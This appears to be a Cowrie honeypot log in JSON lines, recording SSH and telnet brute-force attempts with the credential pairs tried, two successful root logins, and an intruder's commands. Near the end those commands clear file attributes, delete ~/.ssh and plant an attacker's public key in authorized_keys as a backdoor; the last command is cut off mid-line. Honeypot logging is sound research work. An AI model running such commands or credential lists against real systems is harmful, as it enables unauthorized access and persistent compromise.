{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:58:02.635623Z","src_ip":"212.227.235.229","session":"8879efb79977"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T09:58:03.701364Z","src_ip":"212.227.235.229","session":"8879efb79977"}
{"eventid":"cowrie.session.closed","duration":31.074235677719116,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:04.183252Z","src_ip":"103.107.97.234","session":"b0598fa5a7c2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:04.974391Z","src_ip":"212.227.235.229","session":"8879efb79977"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44780,"dst_ip":"1.2.3.4","dst_port":22,"session":"22deccf88e5d","protocol":"ssh","message":"New connection: 212.227.235.229:44780 (1.2.3.4:22) [session: 22deccf88e5d]","sensor":"my-vps","timestamp":"2025-09-09T09:58:05.223841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:58:05.230360Z","src_ip":"212.227.235.229","session":"22deccf88e5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:58:05.483754Z","src_ip":"212.227.235.229","session":"22deccf88e5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35498,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9f659ee4c53","protocol":"ssh","message":"New connection: 212.227.235.229:35498 (1.2.3.4:22) [session: b9f659ee4c53]","sensor":"my-vps","timestamp":"2025-09-09T09:58:05.885086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:58:05.888098Z","src_ip":"212.227.235.229","session":"b9f659ee4c53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:58:05.988610Z","src_ip":"212.227.235.229","session":"b9f659ee4c53"}
{"eventid":"cowrie.login.failed","username":"service","password":"Password","message":"login attempt [service/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T09:58:06.424329Z","src_ip":"212.227.235.229","session":"b9f659ee4c53"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:58:06.519109Z","src_ip":"212.227.235.229","session":"22deccf88e5d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:06.782141Z","src_ip":"212.227.235.229","session":"22deccf88e5d"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:06.784429Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:07.854277Z","src_ip":"212.227.235.229","session":"b9f659ee4c53"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:25.982648Z","src_ip":"212.227.125.160","session":"0078440c4a18"}
{"eventid":"cowrie.session.closed","duration":180.12209486961365,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:25.989097Z","src_ip":"212.227.125.160","session":"0078440c4a18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54728,"dst_ip":"1.2.3.4","dst_port":22,"session":"93f323f58978","protocol":"ssh","message":"New connection: 212.227.235.229:54728 (1.2.3.4:22) [session: 93f323f58978]","sensor":"my-vps","timestamp":"2025-09-09T09:58:34.351104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:58:34.356206Z","src_ip":"212.227.235.229","session":"93f323f58978"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:58:34.642331Z","src_ip":"212.227.235.229","session":"93f323f58978"}
{"eventid":"cowrie.login.failed","username":"ahmed","password":"P@ssw0rd","message":"login attempt [ahmed/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T09:58:35.821843Z","src_ip":"212.227.235.229","session":"93f323f58978"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:37.110794Z","src_ip":"212.227.235.229","session":"93f323f58978"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36736,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff47f3f6ef87","protocol":"ssh","message":"New connection: 212.227.235.229:36736 (1.2.3.4:22) [session: ff47f3f6ef87]","sensor":"my-vps","timestamp":"2025-09-09T09:59:20.620164Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35504,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b6ca7f4e1f4","protocol":"ssh","message":"New connection: 212.227.235.229:35504 (1.2.3.4:22) [session: 0b6ca7f4e1f4]","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.632424Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38950,"dst_ip":"1.2.3.4","dst_port":22,"session":"548c6cba75fb","protocol":"ssh","message":"New connection: 212.227.235.229:38950 (1.2.3.4:22) [session: 548c6cba75fb]","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.633247Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46978,"dst_ip":"1.2.3.4","dst_port":22,"session":"941e437ee367","protocol":"ssh","message":"New connection: 212.227.235.229:46978 (1.2.3.4:22) [session: 941e437ee367]","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.633846Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46194,"dst_ip":"1.2.3.4","dst_port":22,"session":"31c52592708d","protocol":"ssh","message":"New connection: 212.227.125.160:46194 (1.2.3.4:22) [session: 31c52592708d]","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.634464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.636406Z","src_ip":"212.227.235.229","session":"ff47f3f6ef87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58463,"dst_ip":"1.2.3.4","dst_port":23,"session":"9ac0fe6ca211","protocol":"telnet","message":"New connection: 212.227.235.229:58463 (1.2.3.4:23) [session: 9ac0fe6ca211]","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.637220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.637646Z","src_ip":"212.227.235.229","session":"0b6ca7f4e1f4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.638034Z","src_ip":"212.227.235.229","session":"548c6cba75fb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.638601Z","src_ip":"212.227.235.229","session":"941e437ee367"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.639060Z","src_ip":"212.227.125.160","session":"31c52592708d"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.639958Z","src_ip":"212.227.235.229","session":"ff47f3f6ef87"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.640898Z","src_ip":"212.227.235.229","session":"0b6ca7f4e1f4"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.641341Z","src_ip":"212.227.235.229","session":"548c6cba75fb"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.641757Z","src_ip":"212.227.235.229","session":"941e437ee367"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.719762Z","src_ip":"212.227.125.160","session":"31c52592708d"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"firewall","message":"login attempt [loginuser/firewall] failed","sensor":"my-vps","timestamp":"2025-09-09T10:00:07.941519Z","src_ip":"212.227.125.160","session":"31c52592708d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:09.002487Z","src_ip":"212.227.125.160","session":"31c52592708d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35512,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4bb3f015aac","protocol":"ssh","message":"New connection: 212.227.235.229:35512 (1.2.3.4:22) [session: c4bb3f015aac]","sensor":"my-vps","timestamp":"2025-09-09T10:00:12.732283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:12.732966Z","src_ip":"212.227.235.229","session":"c4bb3f015aac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:00:12.831033Z","src_ip":"212.227.235.229","session":"c4bb3f015aac"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"1","message":"login attempt [redhat/1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:00:13.259795Z","src_ip":"212.227.235.229","session":"c4bb3f015aac"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:14.359365Z","src_ip":"212.227.235.229","session":"c4bb3f015aac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57220,"dst_ip":"1.2.3.4","dst_port":22,"session":"e395e39eae98","protocol":"ssh","message":"New connection: 212.227.235.229:57220 (1.2.3.4:22) [session: e395e39eae98]","sensor":"my-vps","timestamp":"2025-09-09T10:00:20.633800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:20.638360Z","src_ip":"212.227.235.229","session":"e395e39eae98"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:00:20.908687Z","src_ip":"212.227.235.229","session":"e395e39eae98"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"1","message":"login attempt [ctf/1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:00:22.496701Z","src_ip":"212.227.235.229","session":"e395e39eae98"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:23.767104Z","src_ip":"212.227.235.229","session":"e395e39eae98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37378,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cccdac9e705","protocol":"ssh","message":"New connection: 212.227.235.229:37378 (1.2.3.4:22) [session: 3cccdac9e705]","sensor":"my-vps","timestamp":"2025-09-09T10:00:36.708907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:36.713484Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:00:36.975394Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd8888","message":"login attempt [root/Abcd8888] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:00:38.069830Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.session.closed","duration":30.655181407928467,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:38.292372Z","src_ip":"212.227.235.229","session":"9ac0fe6ca211"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:00:38.658071Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:00:38.660445Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:00:38.662982Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:38.924321Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:00:39.512545Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 